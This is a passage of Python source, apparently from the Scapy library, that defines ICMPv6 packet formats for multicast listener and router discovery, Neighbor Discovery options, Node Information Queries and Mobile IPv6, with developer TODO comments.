# multicast address (FF02::2), carrying in its multicast address field
# the address to which it is ceasing to listen.
# TODO : See what we can do to automatically include a Router Alert
#        Option in a Hop-by-Hop Options Header.
class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
    name = "MLD - Multicast Listener Done"
    type = 132
    overload_fields = {IPv6: { "dst": "ff02::2", "hlim": 1, "nh": 58}}


########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ###############

# TODO:
# - 04/09/06 troglocan : find a way to automatically add a router alert
#            option for all MRD packets. This could be done in a specific
#            way when IPv6 is the under layer with some specific keyword
#            like 'exthdr'. This would allow to keep compatibility with
#            providing IPv6 fields to be overloaded in fields_desc.
#
#            At the moment, if the user inserts an IPv6 Router Alert option,
#            none of the IPv6 default values of the IPv6 layer will be set.
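# Example (illustrative sketch, not used by the module itself): until router
# alert insertion is automated, the required option can be supplied by hand
# through a Hop-by-Hop header, e.g. for an MLD General Query:
#
#   >>> p = (IPv6(dst="ff02::1", hlim=1)
#   ...      / IPv6ExtHdrHopByHop(options=[RouterAlert(value=0)])
#   ...      / ICMPv6MLQuery())
#
# RouterAlert value 0 means "Datagram contains a MLD message" (RFC 2711).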
class ICMPv6MRD_Advertisement(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Advertisement" fields_desc = [ByteEnumField("type", 151, icmp6types), ByteField("advinter", 20), XShortField("cksum", None), ShortField("queryint", 0), ShortField("robustness", 0)] overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:8], s[8:] class ICMPv6MRD_Solicitation(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Solicitation" fields_desc = [ByteEnumField("type", 152, icmp6types), ByteField("res", 0), XShortField("cksum", None) ] overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:4], s[4:] class ICMPv6MRD_Termination(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Termination" fields_desc = [ByteEnumField("type", 153, icmp6types), ByteField("res", 0), XShortField("cksum", None) ] overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::6A"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:4], s[4:] ################### ICMPv6 Neighbor Discovery (RFC 2461) #################### icmp6ndopts = { 1: "Source Link-Layer Address", 2: "Target Link-Layer Address", 3: "Prefix Information", 4: "Redirected Header", 5: "MTU", 6: "NBMA Shortcut Limit Option", # RFC2491 7: "Advertisement Interval Option", 8: "Home Agent Information Option", 9: "Source Address List", 10: "Target Address List", 11: "CGA Option", # RFC 3971 12: "RSA Signature Option", # RFC 3971 13: "Timestamp Option", # RFC 3971 14: "Nonce option", # RFC 3971 15: "Trust Anchor Option", # RFC 3971 16: "Certificate Option", # RFC 3971 17: "IP Address Option", # RFC 4068 18: "New Router Prefix Information Option", # RFC 4068 19: "Link-layer Address Option", # RFC 4068 20: "Neighbor Advertisement Acknowledgement Option", 21: "CARD Request Option", # RFC 4065/4066/4067 22: "CARD Reply Option", # RFC 4065/4066/4067 23: "MAP Option", # RFC 4140 24: "Route Information Option", # RFC 4191 25: "Recusive DNS Server Option", 26: "IPv6 Router Advertisement Flags Option" } icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr", 2: "ICMPv6NDOptDstLLAddr", 3: "ICMPv6NDOptPrefixInfo", 4: "ICMPv6NDOptRedirectedHdr", 5: "ICMPv6NDOptMTU", 6: "ICMPv6NDOptShortcutLimit", 7: "ICMPv6NDOptAdvInterval", 8: "ICMPv6NDOptHAInfo", 9: "ICMPv6NDOptSrcAddrList", 10: "ICMPv6NDOptTgtAddrList", #11: Do Me, #12: Do Me, #13: Do Me, #14: Do Me, #15: Do Me, #16: Do Me, 17: "ICMPv6NDOptIPAddr", 18: "ICMPv6NDOptNewRtrPrefix", 19: "ICMPv6NDOptLLA", #18: Do Me, #19: Do Me, #20: Do Me, #21: Do Me, #22: Do Me, 23: "ICMPv6NDOptMAP", 24: "ICMPv6NDOptRouteInfo", 25: "ICMPv6NDOptRDNSS", 26: "ICMPv6NDOptEFA", 31: "ICMPv6NDOptDNSSL" } class _ICMPv6NDGuessPayload: name = "Dummy ND class that implements guess_payload_class()" def guess_payload_class(self,p): if len(p) > 1: return get_cls(icmp6ndoptscls.get(ord(p[0]),"Raw"), "Raw") # s/Raw/ICMPv6NDOptUnknown/g ? # Beginning of ICMPv6 Neighbor Discovery Options. class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" fields_desc = [ ByteField("type",None), FieldLenField("len",None,length_of="data",fmt="B", adjust = lambda pkt,x: x+2), StrLenField("data","", length_from = lambda pkt: pkt.len-2) ] # NOTE: len includes type and len field. 
Expressed in unit of 8 bytes # TODO: Revoir le coup du ETHER_ANY class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address" fields_desc = [ ByteField("type", 1), ByteField("len", 1), MACField("lladdr", ETHER_ANY) ] def mysummary(self): return self.sprintf("%name% %lladdr%") class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr): name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address" type = 2 class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Prefix Information" fields_desc = [ ByteField("type",3), ByteField("len",4), ByteField("prefixlen",None), BitField("L",1,1), BitField("A",1,1), BitField("R",0,1), BitField("res1",0,5), XIntField("validlifetime",0xffffffffL), XIntField("preferredlifetime",0xffffffffL), XIntField("res2",0x00000000), IP6Field("prefix","::") ] def mysummary(self): return self.sprintf("%name% %prefix%") # TODO: We should also limit the size of included packet to something # like (initiallen - 40 - 2) class TruncPktLenField(PacketLenField): __slots__ = ["cur_shift"] def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0): PacketLenField.__init__(self, name, default, cls, length_from=length_from) self.cur_shift = cur_shift def getfield(self, pkt, s): l = self.length_from(pkt) i = self.m2i(pkt, s[:l]) return s[l:],i def m2i(self, pkt, m): s = None try: # It can happen we have sth shorter than 40 bytes s = self.cls(m) except: return conf.raw_layer(m) return s def i2m(self, pkt, x): s = str(x) l = len(s) r = (l + self.cur_shift) % 8 l = l - r return s[:l] def i2len(self, pkt, i): return len(self.i2m(pkt, i)) # Faire un post_build pour le recalcul de la taille (en multiple de 8 octets) class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Redirected Header" fields_desc = [ ByteField("type",4), FieldLenField("len", None, length_of="pkt", fmt="B", adjust = lambda pkt,x:(x+8)/8), StrFixedLenField("res", "\x00"*6, 6), TruncPktLenField("pkt", "", IPv6, 8, length_from = lambda pkt: 8*pkt.len-8) ] # See which value should be used for default MTU instead of 1280 class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - MTU" fields_desc = [ ByteField("type",5), ByteField("len",1), XShortField("res",0), IntField("mtu",1280)] class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit" fields_desc = [ ByteField("type", 6), ByteField("len", 1), ByteField("shortcutlim", 40), # XXX ByteField("res1", 0), IntField("res2", 0) ] class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery - Interval Advertisement" fields_desc = [ ByteField("type",7), ByteField("len",1), ShortField("res", 0), IntField("advint", 0) ] def mysummary(self): return self.sprintf("%name% %advint% milliseconds") class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery - Home Agent Information" fields_desc = [ ByteField("type",8), ByteField("len",1), ShortField("res", 0), ShortField("pref", 0), ShortField("lifetime", 1)] def mysummary(self): return self.sprintf("%name% %pref% %lifetime% seconds") # type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support # type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor 
Discovery - IP Address Option (FH for MIPv6)" fields_desc = [ ByteField("type",17), ByteField("len", 3), ByteEnumField("optcode", 1, {1: "Old Care-Of Address", 2: "New Care-Of Address", 3: "NAR's IP address" }), ByteField("plen", 64), IntField("res", 0), IP6Field("addr", "::") ] class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" fields_desc = [ ByteField("type",18), ByteField("len", 3), ByteField("optcode", 0), ByteField("plen", 64), IntField("res", 0), IP6Field("prefix", "::") ] _rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 1: "LLA for the new AP", 2: "LLA of the MN", 3: "LLA of the NAR", 4: "LLA of the src of TrSolPr or PrRtAdv msg", 5: "AP identified by LLA belongs to current iface of router", 6: "No preifx info available for AP identified by the LLA", 7: "No fast handovers support for AP identified by the LLA" } class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" fields_desc = [ ByteField("type", 19), ByteField("len", 1), ByteEnumField("optcode", 0, _rfc4068_lla_optcode), MACField("lla", ETHER_ANY) ] # We only support ethernet class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140 name = "ICMPv6 Neighbor Discovery - MAP Option" fields_desc = [ ByteField("type", 23), ByteField("len", 3), BitField("dist", 1, 4), BitField("pref", 15, 4), # highest availability BitField("R", 1, 1), BitField("res", 0, 7), IntField("validlifetime", 0xffffffff), IP6Field("addr", "::") ] class IP6PrefixField(IP6Field): __slots__ = ["length_from"] def __init__(self, name, default): IP6Field.__init__(self, name, default) self.length_from = lambda pkt: 8*(pkt.len - 1) def addfield(self, pkt, s, val): return s + self.i2m(pkt, val) def getfield(self, pkt, s): l = self.length_from(pkt) p = s[:l] if l < 16: p += '\x00'*(16-l) return s[l:], self.m2i(pkt,p) def i2len(self, pkt, x): return len(self.i2m(pkt, x)) def i2m(self, pkt, x): l = pkt.len if x is None: x = "::" if l is None: l = 1 x = inet_pton(socket.AF_INET6, x) if l is None: return x if l in [0, 1]: return "" if l in [2, 3]: return x[:8*(l-1)] return x + '\x00'*8*(l-3) class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191 name = "ICMPv6 Neighbor Discovery Option - Route Information Option" fields_desc = [ ByteField("type",24), FieldLenField("len", None, length_of="prefix", fmt="B", adjust = lambda pkt,x: x/8 + 1), ByteField("plen", None), BitField("res1",0,3), BitField("prf",0,2), BitField("res2",0,3), IntField("rtlifetime", 0xffffffff), IP6PrefixField("prefix", None) ] class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" fields_desc = [ ByteField("type", 25), FieldLenField("len", None, count_of="dns", fmt="B", adjust = lambda pkt,x: 2*x+1), ShortField("res", None), IntField("lifetime", 0xffffffff), IP6ListField("dns", [], length_from = lambda pkt: 8*(pkt.len-1)) ] class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 
5075) name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option" fields_desc = [ ByteField("type", 26), ByteField("len", 1), BitField("res", 0, 48) ] from scapy.layers.dhcp6 import DomainNameListField class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option" fields_desc = [ ByteField("type", 31), FieldLenField("len", None, length_of="searchlist", fmt="B", adjust=lambda pkt, x: 1+ x/8), ShortField("res", None), IntField("lifetime", 0xffffffff), DomainNameListField("searchlist", [], length_from=lambda pkt: 8*pkt.len -8, padded=True) ] # End of ICMPv6 Neighbor Discovery Options. class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Neighbor Discovery - Router Solicitation" fields_desc = [ ByteEnumField("type", 133, icmp6types), ByteField("code",0), XShortField("cksum", None), IntField("res",0) ] overload_fields = {IPv6: { "nh": 58, "dst": "ff02::2", "hlim": 255 }} class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Neighbor Discovery - Router Advertisement" fields_desc = [ ByteEnumField("type", 134, icmp6types), ByteField("code",0), XShortField("cksum", None), ByteField("chlim",0), BitField("M",0,1), BitField("O",0,1), BitField("H",0,1), BitEnumField("prf",1,2, { 0: "Medium (default)", 1: "High", 2: "Reserved", 3: "Low" } ), # RFC 4191 BitField("P",0,1), BitField("res",0,2), ShortField("routerlifetime",1800), IntField("reachabletime",0), IntField("retranstimer",0) ] overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} def answers(self, other): return isinstance(other, ICMPv6ND_RS) class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation" fields_desc = [ ByteEnumField("type",135, icmp6types), ByteField("code",0), XShortField("cksum", None), IntField("res", 0), IP6Field("tgt","::") ] overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} def mysummary(self): return self.sprintf("%name% (tgt: %tgt%)") def hashret(self): return self.tgt+self.payload.hashret() class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement" fields_desc = [ ByteEnumField("type",136, icmp6types), ByteField("code",0), XShortField("cksum", None), BitField("R",1,1), BitField("S",0,1), BitField("O",1,1), XBitField("res",0,29), IP6Field("tgt","::") ] overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} def mysummary(self): return self.sprintf("%name% (tgt: %tgt%)") def hashret(self): return self.tgt+self.payload.hashret() def answers(self, other): return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt # associated possible options : target link-layer option, Redirected header class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Redirect" fields_desc = [ ByteEnumField("type",137, icmp6types), ByteField("code",0), XShortField("cksum", None), XIntField("res",0), IP6Field("tgt","::"), IP6Field("dst","::") ] overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }} ################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ############### class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List" fields_desc = [ ByteField("type",9), FieldLenField("len", None, count_of="addrlist", fmt="B", adjust = lambda pkt,x: 2*x+1), StrFixedLenField("res", "\x00"*6, 6), IP6ListField("addrlist", [], length_from = lambda pkt: 
                                              8*(pkt.len-1)) ]

class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
    name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
    type = 10

# RFC3122
# Required options: source lladdr and target lladdr
# Other valid options: source address list, MTU
# - As stated in the document, it would be nice to take the L2 address
#   requested in the mandatory target lladdr option and use it as the
#   Ethernet destination address when no address is specified.
# - That does not seem very practical if the user has to provide all
#   the options himself.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
    name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
    fields_desc = [ ByteEnumField("type",141, icmp6types),
                    ByteField("code",0),
                    XShortField("cksum",None),
                    XIntField("reserved",0) ]
    overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}

# Required options: target lladdr, target address list
# Other valid options: MTU
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
    fields_desc = [ ByteEnumField("type",142, icmp6types),
                    ByteField("code",0),
                    XShortField("cksum",None),
                    XIntField("reserved",0) ]
    overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}


###############################################################################
# ICMPv6 Node Information Queries (RFC 4620)
###############################################################################

# [ ] Add automatic destination address computation using computeNIGroupAddr
#     in IPv6 class (Scapy6 modification when integrated) if :
#       - it is not provided
#       - upper layer is ICMPv6NIQueryName() with a valid value
# [ ] Try to be liberal in what we accept as internal values for _explicit_
#     DNS elements provided by users. Any string should be considered
#     valid and kept as provided. At the moment, i2repr() will
#     crash on many inputs.
# [ ] Do the documentation
# [ ] Add regression tests
# [ ] Perform tests against real machines (a NOOP reply is proof of implementation).
# [ ] Check if there are differences between different stacks. Among *BSD,
#     with others.
# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompression in
#     dnsrepr2names(). It should be possible to deactivate it.

icmp6_niqtypes = { 0: "NOOP",
                   2: "Node Name",
                   3: "IPv6 Address",
                   4: "IPv4 Address" }


class _ICMPv6NIHashret:
    def hashret(self):
        return self.nonce

class _ICMPv6NIAnswers:
    def answers(self, other):
        return self.nonce == other.nonce

# Buggy; always returns the same value during a session
class NonceField(StrFixedLenField):
    def __init__(self, name, default=None):
        StrFixedLenField.__init__(self, name, default, 8)
        if default is None:
            self.default = self.randval()

# Compute the NI group Address. Can take an FQDN as input parameter
def computeNIGroupAddr(name):
    import md5
    name = name.lower().split(".")[0]
    record = chr(len(name))+name
    h = md5.new(record)
    h = h.digest()
    addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
    return addr


# Here is the deal. First, that protocol is a piece of shit. Then, we
# provide 4 classes for the different kinds of Requests (one for every
# valid qtype: NOOP, Node Name, IPv6@, IPv4@).
They all share the same # data field class that is made to be smart by guessing the specifc # type of value provided : # # - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, # if not overriden by user # - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, # if not overriden # - Name in the other cases: code is set to 0, if not overriden by user # # Internal storage, is not only the value, but the a pair providing # the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@) # # Note : I merged getfield() and m2i(). m2i() should not be called # directly anyway. Same remark for addfield() and i2m() # # -- arno # "The type of information present in the Data field of a query is # declared by the ICMP Code, whereas the type of information in a # Reply is determined by the Qtype" def names2dnsrepr(x): """ Take as input a list of DNS names or a single DNS name and encode it in DNS format (with possible compression) If a string that is already a DNS name in DNS format is passed, it is returned unmodified. Result is a string. !!! At the moment, compression is not implemented !!! """ if type(x) is str: if x and x[-1] == '\x00': # stupid heuristic return x x = [x] res = [] for n in x: termin = "\x00" if n.count('.') == 0: # single-component gets one more termin += '\x00' n = "".join(map(lambda y: chr(len(y))+y, n.split("."))) + termin res.append(n) return "".join(res) def dnsrepr2names(x): """ Take as input a DNS encoded string (possibly compressed) and returns a list of DNS names contained in it. If provided string is already in printable format (does not end with a null character, a one element list is returned). Result is a list. """ res = [] cur = "" while x: l = ord(x[0]) x = x[1:] if l == 0: if cur and cur[-1] == '.': cur = cur[:-1] res.append(cur) cur = "" if x and ord(x[0]) == 0: # single component x = x[1:] continue if l & 0xc0: # XXX TODO : work on that -- arno raise Exception("DNS message can't be compressed at this point!") else: cur += x[:l]+"." 
x = x[l:] return res class NIQueryDataField(StrField): def __init__(self, name, default): StrField.__init__(self, name, default) def i2h(self, pkt, x): if x is None: return x t,val = x if t == 1: val = dnsrepr2names(val)[0] return val def h2i(self, pkt, x): if x is tuple and type(x[0]) is int: return x val = None try: # Try IPv6 inet_pton(socket.AF_INET6, x) val = (0, x) except: try: # Try IPv4 inet_pton(socket.AF_INET, x) val = (2, x) except: # Try DNS if x is None: x = "" x = names2dnsrepr(x) val = (1, x) return val def i2repr(self, pkt, x): t,val = x if t == 1: # DNS Name # we don't use dnsrepr2names() to deal with # possible weird data extracted info res = [] weird = None while val: l = ord(val[0]) val = val[1:] if l == 0: if (len(res) > 1 and val): # fqdn with data behind weird = val elif len(val) > 1: # single label with data behind weird = val[1:] break res.append(val[:l]+".") val = val[l:] tmp = "".join(res) if tmp and tmp[-1] == '.': tmp = tmp[:-1] return tmp return repr(val) def getfield(self, pkt, s): qtype = getattr(pkt, "qtype") if qtype == 0: # NOOP return s, (0, "") else: code = getattr(pkt, "code") if code == 0: # IPv6 Addr return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16])) elif code == 2: # IPv4 Addr return s[4:], (2, inet_ntop(socket.AF_INET, s[:4])) else: # Name or Unknown return "", (1, s) def addfield(self, pkt, s, val): if ((type(val) is tuple and val[1] is None) or val is None): val = (1, "") t = val[0] if t == 1: return s + val[1] elif t == 0: return s + inet_pton(socket.AF_INET6, val[1]) else: return s + inet_pton(socket.AF_INET, val[1]) class NIQueryCodeField(ByteEnumField): def i2m(self, pkt, x): if x is None: d = pkt.getfieldval("data") if d is None: return 1 elif d[0] == 0: # IPv6 address return 0 elif d[0] == 1: # Name return 1 elif d[0] == 2: # IPv4 address return 2 else: return 1 return x _niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"} #_niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", # 8: "Link-local addresses", 16: "Site-local addresses", # 32: "Global addresses" } # "This NI type has no defined flags and never has a Data Field". Used # to know if the destination is up and implements NI protocol. class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6): name = "ICMPv6 Node Information Query - NOOP Query" fields_desc = [ ByteEnumField("type", 139, icmp6types), NIQueryCodeField("code", None, _niquery_code), XShortField("cksum", None), ShortEnumField("qtype", 0, icmp6_niqtypes), BitField("unused", 0, 10), FlagsField("flags", 0, 6, "TACLSG"), NonceField("nonce", None), NIQueryDataField("data", None) ] class ICMPv6NIQueryName(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv6 Name Query" qtype = 2 # We ask for the IPv6 address of the peer class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv6 Address Query" qtype = 3 flags = 0x3E class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv4 Address Query" qtype = 4 _nireply_code = { 0: "Successful Reply", 1: "Response Refusal", 3: "Unknown query type" } _nireply_flags = { 1: "Reply set incomplete", 2: "All unicast addresses", 4: "IPv4 addresses", 8: "Link-local addresses", 16: "Site-local addresses", 32: "Global addresses" } # Internal repr is one of those : # (0, "some string") : unknow qtype value are mapped to that one # (3, [ (ttl, ip6), ... ]) # (4, [ (ttl, ip4), ... ]) # (2, [ttl, dns_names]) : dns_names is one string that contains # all the DNS names. 
Internally it is kept ready to be sent # (undissected). i2repr() decode it for user. This is to # make build after dissection bijective. # # I also merged getfield() and m2i(), and addfield() and i2m(). class NIReplyDataField(StrField): def i2h(self, pkt, x): if x is None: return x t,val = x if t == 2: ttl, dnsnames = val val = [ttl] + dnsrepr2names(dnsnames) return val def h2i(self, pkt, x): qtype = 0 # We will decode it as string if not # overridden through 'qtype' in pkt # No user hint, let's use 'qtype' value for that purpose if type(x) is not tuple: if pkt is not None: qtype = getattr(pkt, "qtype") else: qtype = x[0] x = x[1] # From that point on, x is the value (second element of the tuple) if qtype == 2: # DNS name if type(x) is str: # listify the string x = [x] if type(x) is list and x and type(x[0]) is not int: # ttl was omitted : use 0 x = [0] + x ttl = x[0] names = x[1:] return (2, [ttl, names2dnsrepr(names)]) elif qtype in [3, 4]: # IPv4 or IPv6 addr if type(x) is str: x = [x] # User directly provided an IP, instead of list # List elements are not tuples, user probably # omitted ttl value : we will use 0 instead def addttl(x): if type(x) is str: return (0, x) return x return (qtype, map(addttl, x)) return (qtype, x) def addfield(self, pkt, s, val): t,tmp = val if tmp is None: tmp = "" if t == 2: ttl,dnsstr = tmp return s+ struct.pack("!I", ttl) + dnsstr elif t == 3: return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET6, y), tmp)) elif t == 4: return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET, y), tmp)) else: return s + tmp def getfield(self, pkt, s): code = getattr(pkt, "code") if code != 0: return s, (0, "") qtype = getattr(pkt, "qtype") if qtype == 0: # NOOP return s, (0, "") elif qtype == 2: if len(s) < 4: return s, (0, "") ttl = struct.unpack("!I", s[:4])[0] return "", (2, [ttl, s[4:]]) elif qtype == 3: # IPv6 addresses with TTLs # XXX TODO : get the real length res = [] while len(s) >= 20: # 4 + 16 ttl = struct.unpack("!I", s[:4])[0] ip = inet_ntop(socket.AF_INET6, s[4:20]) res.append((ttl, ip)) s = s[20:] return s, (3, res) elif qtype == 4: # IPv4 addresses with TTLs # XXX TODO : get the real length res = [] while len(s) >= 8: # 4 + 4 ttl = struct.unpack("!I", s[:4])[0] ip = inet_ntop(socket.AF_INET, s[4:8]) res.append((ttl, ip)) s = s[8:] return s, (4, res) else: # XXX TODO : implement me and deal with real length return "", (0, s) def i2repr(self, pkt, x): if x is None: return "[]" if type(x) is tuple and len(x) == 2: t, val = x if t == 2: # DNS names ttl,l = val l = dnsrepr2names(l) return "ttl:%d %s" % (ttl, ", ".join(l)) elif t == 3 or t == 4: return "[ %s ]" % (", ".join(map(lambda (x,y): "(%d, %s)" % (x, y), val))) return repr(val) return repr(x) # XXX should not happen # By default, sent responses have code set to 0 (successful) class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6): name = "ICMPv6 Node Information Reply - NOOP Reply" fields_desc = [ ByteEnumField("type", 140, icmp6types), ByteEnumField("code", 0, _nireply_code), XShortField("cksum", None), ShortEnumField("qtype", 0, icmp6_niqtypes), BitField("unused", 0, 10), FlagsField("flags", 0, 6, "TACLSG"), NonceField("nonce", None), NIReplyDataField("data", None)] class ICMPv6NIReplyName(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Node Names" qtype = 2 class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - IPv6 addresses" qtype = 3 class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP): name = 
"ICMPv6 Node Information Reply - IPv4 addresses" qtype = 4 class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Responder refuses to supply answer" code = 1 class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Qtype unknown to the responder" code = 2 def _niquery_guesser(p): cls = conf.raw_layer type = ord(p[0]) if type == 139: # Node Info Query specific stuff if len(p) > 6: qtype, = struct.unpack("!H", p[4:6]) cls = { 0: ICMPv6NIQueryNOOP, 2: ICMPv6NIQueryName, 3: ICMPv6NIQueryIPv6, 4: ICMPv6NIQueryIPv4 }.get(qtype, conf.raw_layer) elif type == 140: # Node Info Reply specific stuff code = ord(p[1]) if code == 0: if len(p) > 6: qtype, = struct.unpack("!H", p[4:6]) cls = { 2: ICMPv6NIReplyName, 3: ICMPv6NIReplyIPv6, 4: ICMPv6NIReplyIPv4 }.get(qtype, ICMPv6NIReplyNOOP) elif code == 1: cls = ICMPv6NIReplyRefuse elif code == 2: cls = ICMPv6NIReplyUnknown return cls ############################################################################# ############################################################################# ### Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) ### ############################################################################# ############################################################################# # Mobile IPv6 ICMPv6 related classes class ICMPv6HAADRequest(_ICMPv6): name = 'ICMPv6 Home Agent Address Discovery Request' fields_desc = [ ByteEnumField("type", 144, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("R", 1, 1, {1: 'MR'}), XBitField("res", 0, 15) ] def hashret(self): return struct.pack("!H",self.id)+self.payload.hashret() class ICMPv6HAADReply(_ICMPv6): name = 'ICMPv6 Home Agent Address Discovery Reply' fields_desc = [ ByteEnumField("type", 145, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("R", 1, 1, {1: 'MR'}), XBitField("res", 0, 15), IP6ListField('addresses', None) ] def hashret(self): return struct.pack("!H",self.id)+self.payload.hashret() def answers(self, other): if not isinstance(other, ICMPv6HAADRequest): return 0 return self.id == other.id class ICMPv6MPSol(_ICMPv6): name = 'ICMPv6 Mobile Prefix Solicitation' fields_desc = [ ByteEnumField("type", 146, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), XShortField("res", 0) ] def _hashret(self): return struct.pack("!H",self.id) class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6): name = 'ICMPv6 Mobile Prefix Advertisement' fields_desc = [ ByteEnumField("type", 147, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("flags", 2, 2, {2: 'M', 1:'O'}), XBitField("res", 0, 14) ] def hashret(self): return struct.pack("!H",self.id) def answers(self, other): return isinstance(other, ICMPv6MPSol) # Mobile IPv6 Options classes _mobopttypes = { 2: "Binding Refresh Advice", 3: "Alternate Care-of Address", 4: "Nonce Indices", 5: "Binding Authorization Data", 6: "Mobile Network Prefix (RFC3963)", 7: "Link-Layer Address (RFC4068)", 8: "Mobile Node Identifier (RFC4283)", 9: "Mobility Message Authentication (RFC4285)", 10: "Replay Protection (RFC4285)", 11: "CGA Parameters Request (RFC4866)", 12: "CGA Parameters (RFC4866)", 13: "Signature (RFC4866)", 14: "Home Keygen Token (RFC4866)", 15: "Care-of Test Init 